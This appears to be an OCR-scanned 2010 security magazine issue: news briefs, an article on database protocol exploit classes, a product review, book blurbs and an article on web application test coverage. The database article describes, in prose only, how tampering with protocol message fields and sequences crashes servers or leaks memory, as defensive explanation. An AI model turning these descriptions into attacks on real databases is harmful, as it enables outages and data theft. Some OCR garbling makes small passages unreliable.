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Interim findings of first EU cyber exercise 




The interim findings and recommendations of EU Member States participants of 
the 1st Pan-European Cyber Security Exercise indicate that Cyber Europe 2010 
was a useful cyber stress test for Europe's public bodies. The full report is to be 
published in early 2011. (www.net-security.org/secworld.php?id=10150) 



Free antispam for Linux mail servers 



BitDefender released Free Antispam for Linux Mail Servers, aimed at indi- 
viduals who run mail servers in environments other than Windows but are 
dissatisfied with the lackluster performance of existing open-source or pro- 
prietary antispam solutions. (www.net-security.org/secworld.php?id=10149) 



Security concerns make 1 in 3 users avoid online banking 




I 4B.SD % I do online banking, but I am 
concerned a bout the increase 
of Internet crime. 



31% I never do online hanking, 
due to security concerns and 
instead go in person to the bank 



20,50 % Of course I feel secure. 



According to a survey by Avira, 1 in 3 people don't use 
online banking because they're concerned with safety 
and almost 50% are at least wary of online banking. 
That leaves just 20% of those surveyed with a confident 
approach to accessing financial accounts using the 
Internet, (www.net-security.org/secworld. php?id=1 01 45) 
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Facebook bug compromises top pages 



A customer of Sendible, an online marketing service for promoting and track- 
ing brands through the use of social media, e-mail and SMS messaging, has 
inadvertently discovered a flaw in Facebook API. Using Sendible's Facebook 
application, he tried to post messages on a few Facebook walls - as a fan - but 
apparently the flaw made them be posted as status messages from the owner 
of the pages. (www.net-security.org/secworld.php?id=10143) 




First credit card with password generator 



Gemalto launched the first credit card to combine one-time password secu- 
rity capabilities with standard payment. This innovation allows banks to 
provide a single card that delivers both payment and increased security for 
online transactions. The new Gemalto Ezio product is immediately avail- 
able in the United States. (www.net-security.org/secworld.php?id=10141) 



Security vendor launches bug bounty 



Barracuda Networks announced their Security Bug Bounty Program, an initiative 
that rewards researchers who identify and report security vulnerabilities in the 
company's security product line. In the past, several technology companies have 
announced bug bounties; however, Barracuda Networks is the first security ven- 
dor to offer such a bold program, to reward researchers for identifying vulnerabili- 
ties in its own products. (www.net-security.org/secworld.php?id=10137) 




Hotmail gets full-session HTTPS 



Firesheep's developers can be satisfied. Not only has Microsoft started contemplat 
ing SSL for Bing but has also provided its Hotmail users with the option of using 
HTTPS throughout their sessions. In addition to that, SkyDrive, Photos, Docs, and 
Devices pages will all automatically use SSL encryption. 
(www.net-security.org/secworld. php?id=1 01 32) 



Data breaches cost hospitals billions 

Data breaches of patient information cost healthcare organizations 
nearly $6 billion annually, and that many breaches go undetected, ac- 
cording to a study by the Ponemon Institute. 

The research indicates that protecting patient data is a low priority for 
hospitals and that organizations have little confidence in their ability to 
secure patient records, putting individuals at great risk for medical identity 
theft, financial theft and embarrassment of exposure of private information. 
(www.net-security.org/secworld. php?id=1 01 25) 
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Real-time phishing attacks increase 

30% of attacks against websites that use two-factor authentication are now utilizing 
real-time man-in-the-middle techniques to bypass this trusted security mechanism, 
according to Trusteer. These findings are based on monitoring of thousands of 
phishing attacks. Authentication information typically captured and used by crimi- 
nals in real time phishing include: one time passwords, tokens, SMS authentica- 
tion, card and readers - rendering them ineffective against this type of attack. 
(www.net-security.org/secworld. php?id=1 01 36) 



AVG Technologies to acquire DroidSecurity 

H» W0* AVG Technologies announced the acquisition of Tel Aviv-based DroidSe- 
fX\[ C" curity, a company focused on protecting smartphones, tablets and other 
devices running on Android. In October 2010, DroidSecurity's mobile se- 
curity app, antivirus free, surpassed the 4.5 million download milestone, 
making it one the most popular security applications on the Android platform. 
(www.net-security.org/secworld. php?id=1 01 31 ) 



Latest IE 0-day exploit finds its way into Eleonore toolkit 

Microsoft will likely be forced to issue an out-of-band-patch for the zero-day 
vulnerability affecting Internet Explorer that has been discovered being ex- 
ploited in the wild. Since then, the zero-day has been used to infect systems 
with the Pirpi and Hupigon Trojans, who open a backdoor into the system. But, 
more importantly, AVG has detected the exploit code in the well-known Eleon- 
ore exploit toolkit, so we can expect an increase in the number of attacks. 
(www.net-security.org/secworld. php?id=1 01 28) 



Royal Navy site hack forces MoD to suspend website 




Uiti : is? 



A Romanian hacker has claimed to have broken into the main British Royal 
Navy website, and posted sensitive information such as usernames and 
administrator passwords. At the time, The Royal Navy has replaced its en- 
tire website with a static image which says, "Unfortunately the Royal Navy 
website is currently undergoing essential maintenance. Please visit again 
soon." (www.net-security.org/secworld. php?id=1 01 22) 



Firesheep countermeasure tool BlackSheep 

Firesheep is the Firefox extension that makes it easier to steal logins and 
take over social media and email accounts after users log in from a WiFi 
hotspot or even their own unprotected network. Zscaler researchers have 
created, and are now offering to every consumer, a free Firefox plugin called 
BlackSheep, which serves as a counter-measure. BlackSheep combats 
Firesheep by monitoring traffic and then alerting users if Firesheep is being 
used on the network. (www.net-security.org/secworld.php?id=10118) 
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Extract and analyze digital evidence from Mac OS X systems 

ATC-NY released Mac Marshal 2.0 which automates the forensics 
process for a cyber investigator. It scans a Macintosh disk, auto- 
matically detects and displays Macintosh and Windows operating 
systems and virtual machine images, then runs a number of 
analysis tools to extract Mac OS X-specific forensic evidence writ- 
ten by the OS and common applications. (www.net-security.org/secworld.php?id=10120) 




Myanmar cut off the Internet ahead of elections 

The Southeast Asian country of Myanmar (formerly known as Burma) has 
been practically cut off the Internet as an extensive DDoS attack that started 
in late October has crippled most network traffic in and out of the country. It is 
still unknown who is behind the attacks. Speculation abounds that the Bur- 
mese government might have something to do with it since the first general 
elections in 20 years were to be held, and the military junta currently in power 
is probably unwilling to hand it over as much as it was two decades ago. 
(www.net-security.org/secworld. php?id=1 01 08) 




Hole in iPhone PayPal app allows account hijacking 

PayPal customers that use the payment company's iPhone application to effectuate 
payments should update it as soon as possible, because a vulnerability that can be 
exploited to hijack their accounts has been found by a security researcher and con- 
firmed by PayPal. The flaw doesn't affect the PayPal site or the company's Android 
application, but the 4+ million people who downloaded the iPhone application so far 
are in danger of getting their passwords intercepted by a hacker if they connect over 
unsecured Wi-Fi networks. (www.net-security.org/secworld.php?id=10102) 




Popular online services graded on SSL implementation 

It seems that Firesheep has succeeded where similar tools have failed in the 
past: the issue of full end-to-end encryption for all websites - especially the 
most popular ones - is finally getting the attention it deserves. And among 
those who view Firesheep's advent as the perfect excuse to point out - and 
keep pointing out - the need for SSL use is journalist George Ou. 
(www.net-security.org/secworld. php?id=1 0097) 




Free Mac anti-virus for home users 
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Sophos announced the availability of a free Mac anti-virus product 
for home users. Based on Sophos's security software, which pro- 
tects over 100 million business users worldwide, Sophos Anti-Virus 
Home Edition for Mac is available for consumers to download at no 
charge, (www.net-security.org/secworld. php?id=1 0085) 



www. i nsecu remag .com 



8 



Human rights organization targeted with cyber attack 



The website of a human rights organization has been knocked offline by a 
DDoS attack they suspect to have been organized either by the Indonesian or 
the Botswana authorities. "This attack comes one week after Survival Interna- 
tional reported on a video of Indonesian soldiers torturing Papuan tribal people, 
and four weeks after calling for tourists to boycott Botswana over the long- 
running persecution of the Kalahari Bushmen," it said in a statement issued by 
the organization, (www.net-security.org/secworld. php?id=1 0090) 



The aftermath of the Bredolab botnet shutdown 




The war against botnets will be long and hard. For one thing, command and 
control centers can be replaced and the targeted botnet resurrected in a rela- 
tively short time if the infected machines aren't cleaned. The high-profile 
shutdown of the Bredolab botnet's command and control servers by the 
Dutch Police is a perfect example of how such half-measures are not effec- 
tive in the long run, since the number of remaining C&Cs is slowly rising 
again, (www.net-security.org/secworld. php?id=1 0089) 




Spying app kicked out of Android Market 




Secret SMS Replicator, a spying application that forwards contents of a user's 
text messages to the phone of the person who installed it in the first place, 
has been booted out of the Android Market. Once the application in question 
is installed, there is no visible shortcut or icon to alert the user about the spy- 
ing that is in progress, so one can see why this would be a problem for Goo- 
gle. (www.net-security.org/secworld. php?id=1 0082) 



Facebook discovers and "punishes" UID-selling developers 

The recent discovery that some Facebook application were inadvertently forward- 
ing users' UIDs to advertising agencies and data collection companies has 
spurred the social network to investigate the matter thoroughly and to try to think 
of a platform-wide solution that would prevent that from happening ever again. 
(www.net-security.org/secworld. php?id=1 0079) 




Fabric weaves security into program code 



Wouldn't it be wonderful if we could build security into a program as it is writ- 
ten? This idea spurred a number of researchers from Cornell University to try 
and develop a new platform and a new language for building secure informa- 
tion systems, which they dubbed Fabric. Comparing the current situation of 
software patching with messy layers of duct tape, Andrew Myers, one of the 
researchers and a professor of computer science says that security vulner- 
abilities are nearly inevitable. With Fabric, they plan to replace all those soft- 
ware layers with one that will enforce security from the get-go. 
(www.net-security.org/secworld. php?id=1 0051 ) 
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New PCI standards completed, tokenization still in question 



The PCI Security Standards Council released version 2.0 of the PCI DSS and 
PA-DSS, designed to provide clarity and flexibility to facilitate improved under- 
standing of the requirements and eased implementation for merchants. Ver- 
sion 2.0 becomes effective on January 1 , 2011 and does not introduce any 
new major requirements, (www.net-security.org/secworld. php?id=1 0070) 




Most Americans support an Internet kill switch 




Sixty-one percent of Americans said the President should have the ability to 
shut down portions of the Internet in the event of a coordinated malicious cy- 
ber attack. The findings illustrate that recent events may have heightened the 
American public's awareness of and concern over global and domestic cy- 
bersecurity threats, (www.net-security.org/secworld. php?id=1 0056) 



80% of firms don't know who should secure cloud data 



The cloud is still akin to the Wild West when it comes to the security of the data 
hosted there, according to Courion. In fact, 1 in 7 companies admit that they 
know there are potential access violations in their cloud applications, but they 
don't know how to find them, (www.net-security.org/secworld. php?id=1 0049) 



MySpace apps send user IDs to advertisers 



This is not the first time MySpace has been found "oversharing" - at the time, they said 
they were working on a method to obfuscate the ID information sent to ad agencies via 
"HTTP referrers". (www.net-security.org/secworld. php?id=1 0041 ) 



Europe's largest security training event 

SANS London 2010 is Europe's largest training event for information and secu 
rity professionals which is celebrating its 5th anniversary this year with one of 
the most comprehensive programs to date. This year's event comprises of 14 
courses covering software and audit, management and compliance as well as 
new additions around security within virtualized environments, network foren- 
sics and ethical hacking, (www. net-secu rity.org/secworld. php?id=9932) 



Finding and managing SSL digital certificates 

Digital certificates represent a necessary security technique for encrypting transmis- 
sions and securing digital identities in today's enterprise. To assist organizations in 
gaining a complete perspective of deployed certificates, Entrust introduced Entrust 
Discovery. The easy-to-use solution finds, inventories and manages digital certifi- 
cates across diverse systems to prevent outages, data breach and non-compliance. 
(www.net-security.org/secworld. php?id=9949) 
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Database protocol exploits explained 

by Amichai Shulman 




In the past few years we have seen a significant increase in attacks targeting 
database communication protocols. This article describes the protocols and 
the risks as well as relevant remediation techniques. 



Introduction to database communication 
protocols 

The syntax and semantics of data access and 
management commands is mostly defined by 
a well-known standard called ANSI SQL 
However, other important aspects of the 
client-server interaction such as the method 
for creating a client session, conveying the 
commands from a client to a server, the 
method for returning data and status to a cli- 
ent, the structure of the returned data and the 
implementation of mechanisms such as cur- 
sors, prepared statements and transactions 
are not defined. These details are filled by 
vendor-specific technology. 

Vendors usually implement these functions 
via an independent application messaging 
layer that can be transported on a variety of 
network protocols. Examples include 
SQL*NET from Oracle, TDS from Sybase, 



another strand of TDS from Microsoft, and 
DRDA from IBM. 

Vulnerabilities explained 

Several classes of vulnerabilities exist when 
analyzing the security aspects of proprietary 
database communication protocols. The Im- 
perva ADC classifies these vulnerabilities 
based on the type of manipulation needed for 
an exploit: 

• Message structure tampering 

• Field size tampering 

• Field content manipulation 

• Message sequence tampering. 

Other vulnerabilities do not require any ma- 
nipulation or tampering. For example, an Ora- 
cle vulnerability, fixed in April 2008. Oracle 
provides various modes of the export func- 
tionality, one of these is called Direct Path. 
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This mode uses a special protocol message 
(0x5B) to extract table data rather than SQL 
queries. Using this special protocol message 
an attacker could extract information from ta- 
bles and views to which she has not been 
granted access. 

Message structure tampering 
vulnerabilities 

A protocol message structure can be de- 
scribed as a list of fields, where each field has 
a specific role and expected format. Message 
structure tampering vulnerabilities yield at- 
tacks against the parsing mechanism that 
typically result in memory corruption. 

The main tampering techniques of this cate- 
gory include removing, adding or duplicating 
fields in a message or combining fields in an 
unexpected manner. 

An example is an IBM DB2 vulnerability pub- 
lished in September 2006. One of the connec- 
tion establishment messages contains an op- 
tional database-name field. However, when 
the message is sent without the "optional" 
database-name, an unhandled exception 



condition occurs on the server, making the 
database inaccessible to all clients. 

Field size manipulation 

Occasionally, fields in a message have their 
sizes explicitly declared using another dedi- 
cated field. Field size manipulation can be 
used to create buffer overflow attacks yielding 
execution of arbitrary code. This occurs when 
the length indicator is capable of expressing 
larger data sizes than actually supported by 
the server software. 

In October 2009, Oracle released a patch fix- 
ing this type of vulnerability which, if exploited, 
affects the confidentiality, integrity and avail- 
ability of the database. 

Another risk occurs when a message includes 
redundant size fields and does not validate 
consistency between all size related fields. An 
example is the TDS "Hello" message (Figure 
1). In this case, the size indicator of an indi- 
vidual field can be set larger than the size of 
the entire message. This causes arbitrary 
memory buffers to be dumped to the network 
connection, thus exposing sensitive informa- 
tion, even passwords (Figure 2). 




Ydlow highlight - Total 
message size 

Red highlight - Local 
field size 



Figure 1 : TDS Hello message - Field size larger than total message size. 
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Figure 2: Sample buffer dumped by the server showing names of connected users (sa). 
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Field content manipulation 

Content manipulation can yield different types 
of attacks including privilege elevation, audit 
evasions and Denial of Service attacks. 

An example of this is a DB2 Universal Data- 
base (UDB) vulnerability fixed in December 
2009. The underlying DB2 network protocol 
translates administration command calls to a 
pre-defined administrative stored procedure 
call. A variable that signifies the type of com- 
mand that should be performed is passed to 
that stored procedure. 

For instance, a client's load' command would 
be passed as the value 0xA6 to this adminis- 
trative stored procedure. However, an at- 
tacker may change the value of the variable to 
one that would cause the server to crash. 
Such tampering terminates the DB2 UDB 
service, effectively denying service from all 
database users. 

Message sequence tampering 

An attacker can issue an irregular sequence 
of well-formed protocol messages that will ef- 
fectively render the server inaccessible. Ex- 
ploiting vulnerabilities of this type sometimes 
requires basic scripting capabilities but often 
can be pursued without automation. 

An IBM Informix server vulnerability, patched 
in 2007, allowed an attacker to send a server 



information requests in a sequence which the 
server did not anticipate. This caused the 
server to panic and terminate unexpectedly. 

New attack types require new protection 
solutions 

Proactive security measures by internal 
server mechanisms cannot be guaranteed as 
programming flaws exist and will continue to 
exist. Database vendors suggest reactive pro- 
tection (patching). However, patching in data- 
base environments usually takes a very long 
time. Traditional IDS/IPS products offer only a 
partial solution because they lack proper in- 
sight into the protocols used by database 
servers. 

A sound security solution should be coupled 
with existing database protection mecha- 
nisms. A database IDS/IPS solution must 
have thorough understanding of the commu- 
nications protocol used by the database 
server. This can provide proactive validation 
of protocol messages. Any message or mes- 
sage sequence that does not comply with ex- 
pected behavior can be flagged or discarded. 

It also provides a reactive mechanism based 
on signatures to provide accurate detection 
and blocking of known exploits. The combina- 
tion of proactive and reactive solutions should 
provide the best protection against these 
classes of database attacks. 



Amichai Shulman is the co-founder and CTO of Imperva (www.imperva.com), where he heads the Application 
Defense Center, Imperva's research organization focused on security and compliance. Under his direction, the 
ADC has been credited with the discovery of serious vulnerabilities in commercial Web application and data- 
base products, including Oracle, IBM, and Microsoft. 
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Entrust understands* Your organization is of war against online Fraud and you've got 
significant resources invested into your current fraud detection solution. Unfortunately,, today's 
online fraud attacks act and adapt very quickly. Notorious strains, such as the infamous Zeus 
virus, even elude many solutions put in place by financial institutions to thwart the first- and 
second-generation threats. 

A layered defense. But today's attacks are more advanced — and constantly evolve. 
To help defend against advanced malware, financial institutions should adopt a proven, 
layered defense that consists of: 

< Strong Two-Factor Authentication 

< Behavioral & Transactional Fraud Detection 

< Out- of- Band Transactional Verification & Signature 

The Entrust approach. The Entrust IdentityGuard versatile authentication platform and 
the Entrust TransactionGuard fraud detection solution combine to form a proven, integrated 
strategy For protecting consumers and business-banking customers from online fraud and 
man-in-the-browser attacks, And they both complement your existing deployed solutions, 

Let's talk. Visit entrust.com/MITB to discover how Entrusts proven approach can 
complement your existing fraud detection solution. And protect your organization from Zeus 
and other malicious malware 

+ 1 888 690 2424 | entrustcom | entrust@entrustcom | +44(0) 118 953 3000 
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Review: MXI M700 Bio 

by Mark Woodstone 



MXI Security is the security division of Memory Experts International, a com- 
pany specializing in memory expansion modules and data storage systems. 
MXI provides Stealth Key portable devices, Stealth HD encrypted hard drives, 
as well as standalone and enterprise software solutions supporting their 
products. They've recently shipped us a copy of their 4 GB M700 Bio, a port- 
able security device with biometric authentication. 



The device is powered by a Bluefly Processor 
which provides on-board hardware AES 256- 
bit encryption, authentication and manageabil- 
ity, and incorporates a biometric fingerprint 
reader. 

The M700 Bio is used as a typical USB stick. 
It doesn't need a driver installation since eve- 
rything is done locally on board the device. 

From a single user perspective, setting up the 
M700 Bio is piece of cake. After connecting it 
to the computer for the first time, you will be 
guided through the customization process 
where you'll choose the appropriate level of 
security to suit your needs. 

You're able to authenticate to the device with 
a default option of a fingerprint swipe, or en- 
able two factor authentication by adding the 
password to the login procedure. I liked the 
fact that you can specify the number of nu- 
meric or, for instance, uppercase characters 
every password must contain. 

The biometrics on the device worked flaw- 
lessly. The user is asked by default to enroll 
two fingers and five successful swipes are 
needed to finalize the enrollment process. 
During the weeks I used the device, I haven't 



had a single unsuccessful instance of finger- 
print swiping. 

Leaving the authentication feature aside, 
M700 Bio is a portable storage device. After a 
successful authentication, you will get instant 
access to the private partition that can be 
used for storing your data. The device sup- 
ports three flavors of Microsoft Windows - XP, 
Vista and 7 - as well as Mac OS X. 

You can control the size of your on-board par- 
titions and - from a security standpoint - be- 
sides the two factor authentication procedure 
needed to access the files, everything is also 
secured by hardware based AES-256 CBC 
encryption. 

The disk can also be mounted as read only 
(malware control), which should come quite 
handy when using the device on untrusted 
computers. 

Along with all the software layers of security, 
the device has its psychical strengths as well - 
it is coated with a waterproof and dustproof 
high-strength magnesium enclosure. As this is 
a portable device, the ergonomic fingerprint 
swiping area is, of course, located under the 
hood. 
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Enroll Biometric 
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The M700 can also be enabled with MXI 
Stealth Zone, the company's innovative plat- 
form for deploying a Secure USB Desktop on 
security devices from their product line. 

This basically lets users authenticated to the 
device to login into Windows and use a tem- 
porary active desktop that stays on the device 
and doesn't leave any traces on the computer 
it was used on. This is made possible by MXI 
Security's FIPS 140-2 Level 3 validated Blue- 
fly processor technology. 



The device is made ready for enterprise by 
ACCESS Enterprise, the company's solution 
which allows administrators to remotely de- 
ploy, customize and manage the entire range 
of MXI Security encrypted drives. Through a 
partnership with McAfee, ACCESS empowers 
an anti-virus and anti-malware scanner for 
additional protection. 

With all of its security features, M700 Bio is 
the perfect solution for all users that don't 
want to leave anything to chance. The various 
layers of security must inspire confidence 
even with the most paranoid of us. 
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Mark Woodstone is a security consultant that works for a large Internet Presence Provider (IPP) that serves 
about 4000 clients from 30 countries worldwide. 
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Latest additions to our bookshelf 




Seven Deadliest Wireless Technologies Attacks 

By Brad Haines 

Syngress, ISBN: 1597495417 



This book introduces the reader to the anatomy of attacks aimed at wireless 
technologies and devices that use them. You'll learn what it takes to execute 
infrastructure attacks on wireless networks; which client-side attacks you 
should look out for; how Bluetooth, RFID, and encryption can be cracked; and 
why you should be careful when using analog wireless devices, cell phones 
and other hybrid devices. You will discover the best ways to defend against 
these vicious hacks with step-by-step instruction and learn techniques to make 
your computer and network impenetrable. 




Cyber War: The Next Threat to National Security and What to Do About It 

By Richard A. Clarke and Robert Knake 

Ecco, ISBN: 0061962236 



G^BER 
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RICHARD A. 

C LARKESr 



Cyber War is a book about technology, government, and military strategy; about 
criminals, spies, soldiers, and hackers. This is the first book about the war of the 
future -- cyber war -- and a convincing argument that we may already be in peril 
of losing it. 

It goes behind the "geek talk" of hackers and computer scientists to explain 
clearly and convincingly what cyber war is, how cyber weapons work, and how 
vulnerable we are as a nation and as individuals to the vast and looming web of 
cyber criminals. 
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Seven Deadliest Network Attacks 

By Stacy Prowell, Rob Kraus and Mike Borkin 
Syngress, ISBN: 1597495492 

Part of Syngress' "The Seven Deadliest Attack Series", this book introduces 
the reader to the anatomy of attacks aimed at networks: DoS, MiTM, war 
dialing, penetration testing, protocol tunneling, password replay and spanning 
tree attacks. 

This book pinpoints the most dangerous hacks and exploits specific to 
networks, laying out the anatomy of these attacks including how to make your 
system more secure. 
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Seven Deadliest Microsoft Attacks 

By Rob Kraus, Brian Barber, Mike Borkin and Naomi Alpern 
Syngress, ISBN: 1597495514 

This book introduces the reader to the anatomy of attacks aimed at Microsoft's 
networks and software: Windows, SQL and Exchange Server, Microsoft Office, 
SharePoint and the Internet Information Services. 

The text is peppered with warnings, notes, recommendations and so-called 
"Epic Fail" text boxes that illustrate some of the typical mistakes made when 
working with that particular software. 




Fatal System Error: The Hunt for the New Crime Lords Who Are Bringing 

Down the Internet 

By Joseph Menn 

PublicAffairs, ISBN: 1586489070 

In this disquieting cyber thriller, Joseph Menn takes readers into the murky 
hacker underground, traveling the globe from San Francisco to Costa Rica and 
London to Russia. His guides are California surfer and computer whiz Barrett 
Lyon and a fearless British high-tech agent. Through these heroes, Menn shows 
the evolution of cybercrime from small-time thieving to sophisticated, organized 
gangs, who began by attacking corporate websites but increasingly steal financial 
data from consumers and defense secrets from governments. Using 
unprecedented access to Mob businesses and Russian officials, the book reveals 
how top criminals earned protection from the Russian government. 

Seven Deadliest Web Application Attacks 

By Mike Shema 

Syngress, ISBN: 1597495433 

This book pinpoints the most dangerous hacks and exploits specific to web 
applications, laying out the anatomy of these attacks including how to make 
your system more secure. You will discover the best ways to defend against 
these vicious hacks with step-by-step instruction and learn techniques to make 
your computer and network impenetrable. Attacks detailed in this book include: 
Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), SQL 
Injection, server misconfiguration and predictable pages, breaking 
authentication schemes, logic attacks, and malware and browser attacks. 
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Measuring web application 
security coverage a 

by Ratal Los ^^m± 




Businesses are under constant threat of the next security breach caused by 
malware, SQL injection and viruses. Could we be setting the stage for even 
more security breaches by not fully understanding the applications that run 
our businesses? 



Web applications pose a particularly danger- 
ous type of threat to an enterprise due to their 
functional complexity and highly extensible 
nature. Exposing functionality beyond the 
corporate perimeter is dangerous, but expos- 
ing poorly understood, hastily coded and 
hardly tested functionality at layer seven is 
enough to keep security professionals up at 
night. 

Even when presented with the opportunity to 
test applications before they are released to 
production, few security professionals are 
equipped to answer the burning question: 
"How much of the application was tested?" 

The question of security coverage is often 
carefully avoided or ignored altogether, but 
neither of these options should be acceptable 
as it raises business risk. In this article, we 
will discuss some of the complexities which 
make answering the question, "How much of 
the application was tested?" so difficult. We 



will also explore how it can be addressed us- 
ing manual or automated methods. 

Understanding the problem 

The core issues are tested with a limited 
amount of time and computing power. These 
limitations should be pushing testers to really 
understand the full risk profile of an applica- 
tion before any security testing is even con- 
ducted. 

Testers should know the full scope of the ap- 
plication and determine the "reach" of the ap- 
plications' components. When an application 
is not comprehensively assessed, it cannot be 
properly tested for security vulnerabilities, 
making the results virtually useless. For ex- 
ample, if a penetration tester has 40 hours to 
perform a security analysis of an application, 
a simple report of vulnerabilities is not helpful 
without knowing how much of the application 
attack surface was covered during the testing 
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period. 

Today, few web application security analyses 
provide coverage metrics, much less accurate 
ones, which causes a potential false sense of 
security to the consumer. Whether the testing 
methodology involves manual testing, an 
automated tools-based approach, or a hybrid 
approach - the lack of coverage metrics is 
alarming and growing more so as the com- 
plexity of "Web 2.0" applications continues to 
grow. This can lead to a dangerous situation 
as these people are the ones empowered to 
make decisions about the risks, yet they do 
not have the full set of data to make educated 
risk decisions. 

Understanding applications 

Understanding "coverage" is not as simple as 
asking how many pages are in an application. 
While that may have been adequate in the 



early 2000's, today this method is mostly inef- 
fective thanks to the MVC model and other 
like frameworks which abstract the idea of 
"pages" on the server, in the controller, from 
what is physically presented to the end-user's 
browser in the "view". 

Expert application security testers agree that 
understanding the web application is critical to 
successfully attacking it. Amazingly though, 
even seasoned testers do not have a solid 
methodology for assessing and representing 
coverage. The issue lies in the difficulty of 
mapping an application's true attack surface. 

Using a layered approach starting at the client 
user interface is one methodology that may 
prove to be successful for mapping the total 
attack surface of a web application. Below, 
we'll address the methodology, practical ap- 
plications, and further research needed. 



USING A LAYERED APPROACH STARTING AT THE CLIENT USER INTERFACE IS ONE 
METHODOLOGY THAT MAY PROVE TO BE SUCCESSFUL FOR MAPPING THE TOTAL 

ATTACK SURFACE OF A WEB APPLICATION 



User Interface (Ul) perspective 

The Ul coverage perspective looks at the ap- 
plication from the viewpoint of the compo- 
nents exposed to the user through the user 
interface - most commonly the browser. The 
Ul perspective covers functions available 
through the user interface, including 
JavaScript-driven events, AJAX calls, forms, 
and client-end technologies such as Flash, 
Silverlight and others. 

Identifying each unique action and stringing 
them together through workflow mapping 
(such as the use of an Execution Flow Dia- 
gram [EFD]) can give a clear picture of the 
total surface area of an application. 

The Ul perspective is difficult to fully map due 
to the extreme complexity of user interface 
components. To illustrate this point, let's look 
at a cascading JavaScript-based menu sys- 
tem in a typical web-based application. If 
there are 5 top-level menu items, each with 5 
sub-items, and 3 sub-sub items, the total 
number of paths can quickly escalate to 75 



possible selections. This only accounts for a 
basic component of the web application - the 
menu system. In order to fully understand the 
attack surface of an application the user must 
logically segment these into units, such as a 
menu system, and work out complexity from 
that angle. 

Ultimately, calculating complexity is not as 
simple as doing some basic algebra. The Ul 
perspective must also account for the different 
client-side actions such as Flash objects and 
Silverlight components. This involves exercis- 
ing all the available "user-visible" components 
such as buttons, menus, and interactive me- 
diums in order to map the whole attack 
surface. 

To further complicate the situation, the Ul per- 
spective also includes non-user-interactive 
components, such as AJAX. While these 
components execute in the user interface 
(browser) they are not triggered entirely by 
the user. This makes it is difficult to map out 
without digging into the request/response be- 
tween the client and server. 
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Application Programming Interface (API) 
perspective 

The API-coverage perspective addresses the 
application at the programming interface, or 
the exposed interface between the application 
and external components. The most common 
way of publishing an API is using Web- 
Services utilizing XML-based data structures 
or JSON (JavaScript Object Notation) over 
Simple Object Access Protocol (SOAP) or the 
more common "Web 2.0" way using the Rep- 
resentational State Transfer (REST) protocol. 

Digging into this coverage requires an under- 
standing of data structures and the ability to 
read code at a basic level. The simplest way 
of mapping the attack surface of web-service 
based API is through the Web Services De- 
scription Language (WSDL) document. This 
document gives an XML-based model of the 
web-service exposed services. Parsing the 
WSDL file (.wsdl)) yields concrete knowledge 



about a web service including the types of 
messages the web service responds to, the 
data formats expected, and ports used in 
communications. 

This information can be used test each of the 
service methods while security testing is be- 
ing performed. WSDL description files support 
SOAP transport as well as RESTful web serv- 
ices, and without a WSDL the user is left at- 
tempting to dig into the functional specification 
of the application to understand the full attack 
surface. 

Computing a complex coverage map of a 
web-services that are based on APIs requires 
a good understanding of the exposed serv- 
ices, methods, and data structures. Rigid 
XML-based data structures are easily com- 
puted, while serialized JavaScript (JSON) is 
less formal and shows the additional attack 
surface by parsing the serialized data. 



COMPUTING A COMPLEX COVERAGE MAP OF A WEB-SERVICES THAT ARE BASED 
ON APIS REQUIRE A GOOD UNDERSTANDING OF THE EXPOSED SERVICES, 

METHODS, AND DATA STRUCTURES 



Code perspective 

The code-coverage perspective is the most 
difficult, aiming to achieve complete (dynamic) 
coverage of source code. Mapping script 
events, buttons, menus and other compo- 
nents against specific code segments is diffi- 
cult and often proves to be a challenging task 
without advanced tools. 

This methodology also addresses a critical 
component not covered by the two previous 
approaches - back-end code. Inevitably ap- 
plications have back-end processes which 
cannot be "seen" from the user interface, or 
the APIs. These back-end processes may 
cause security issues which cannot be under- 
stood without this perspective. 

One example of this is a stored SQL Injection 
vulnerability. Injecting SQL command code 
into a particular form field may not cause se- 
curity issues in that instance due to proper 
handling by the database. However, when a 
web-service call is made against a supporting 



service, a back-end process transports the 
tainted data into another database thus creat- 
ing a SQL Injection condition, leading to an 
exploit. Without the knowledge of the back- 
end process, the user cannot know what is 
happening with the tainted data that cannot 
be "seen" visibly by the Ul. There are numer- 
ous other examples that include "dead" code 
branches which can pose critical risks to ap- 
plication security at later development cycles. 

Mapping an application through the use of 
source-code provides an extremely thorough 
view of the total attack surface, but it can be a 
complex task, requiring highly sophisticated 
tools. The types of highly complex tools re- 
quired utilize the hybrid approach between 
source code and dynamic application function 
to achieve a full mapping of the total applica- 
tion attack surface. 

Generalized analysis 

The simplest way to measure the coverage of 
a web application is to determine whether 
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WHETHER THROUGH THE USE OF TOOLS OR MANUAL PROCESSES, 
UNDERSTANDING COVERAGE IS PARAMOUNT TO KNOWING THE SECURITY 
RISKS AN APPLICATION POSES BEYOND "FOUND VULNERABILITIES," 



each of the components has been exercised, 
tested, and validated in a security testing 
framework. Whether through the use of tools 
or manual processes, understanding cover- 
age is paramount to knowing the security 
risks an application poses beyond "found vul- 
nerabilities." 

Generalized analysis involves pure 
component-based calculation of the attack 
surface, without context or workflow. For ex- 
ample, in generalized analysis, a user simply 
lists out all the exposed Ul-components and 



marks them off as each is exercised and 
tested. Each form, parameter, JavaScript 
event handler, each XDR (Cross-Domain Re- 
quest) and so on as they are identified, 
logged, exercised and tested. 

Generalized analysis can be achieved quickly 
as it is less organized and requires less for- 
mal structure. This method also does not 
guarantee complete coverage measurement, 
although it is a significant improvement over 
no measurement at all. 



BUSINESSES CANNOT AFFORD TO LEAVE THEIR APPLICATIONS RISK ASSESSMENT 
UNADDRESSED AS IT MAY LEAD TO UNFORESEEN CATASTROPHIC FAILURES 

THAT RESULT IN HIGH COSTS 



Coverage-complete analysis 

Workflow-based analysis is another method- 
ology that comes closer to understanding the 
completeness of coverage, but at the sacrifice 
of analysis speed. 

Combining all three perspectives, including 
code-level analysis, this approach seeks to 
build a complete map of the application attack 
surface before exercising and attacking the 
exposed components. 

One of the ways to achieve best coverage- 
complete analysis is through the use of EFD's 
to map the application. This approach will 
combine the three methodologies: Ul, API, 
and code perspectives into coherent work- 
flows through the application. EFD-based 
analysis leverages application requirements 
to build a complete map of the attack surface, 



and can come close to achieving 100% cov- 
erage completeness. Leveraging automation 
solutions that have tight integrations between 
application requirements and test plans can 
greatly support this approach. 

Further research 

It's clear that further research is needed for 
accurately mapping the "security coverage" of 
an application. While today's vulnerability- 
based reporting provides users with a priori- 
tized management of vulnerabilities, the next 
step would be to incorporate an assessment 
that accounts for an application's test cover- 
age. 

Businesses cannot afford to leave their appli- 
cations risk assessment unaddressed as it 
